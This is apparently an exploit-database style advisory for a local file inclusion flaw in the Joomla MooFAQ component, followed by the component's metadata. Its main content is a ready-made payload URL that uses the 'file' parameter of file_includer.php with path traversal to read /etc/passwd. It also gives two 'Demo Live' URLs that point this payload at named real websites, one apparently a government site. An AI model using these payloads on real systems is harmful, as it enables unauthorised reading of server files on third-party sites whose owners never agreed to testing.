---------------------------------------------------------------------- Joomla Component MooFAQ Local File Inclusion Vulnerability ---------------------------------------------------------------------- ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Vulnerability : LFI ################################################### ________________________________________________________ Example: http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI] Demo Live (1): http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd Demo Live (2): http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd ++++++++++++++++++++++++++++++++ [!] Produced in South America -------------------------------- <productName>FAQ Component using mooTools</productName> <creationDate>20 July 2007</creationDate> <version>1.0</version> <joomlaVersion>1.0.13</joomlaVersion> <author>Douglas Machado</author> <authorName>Douglas Machado</authorName> <authorEmail>falecom@focalizaisso.com.br</authorEmail> <authorUrl>opensource.focalizaisso.com.br</authorUrl> <productPicture>config.png</productPicture> <productUrl>http://opensource.focalizaisso.com.br/</productUrl> <setupUrl>http://opensource.focalizaisso.com.br/</setupUrl>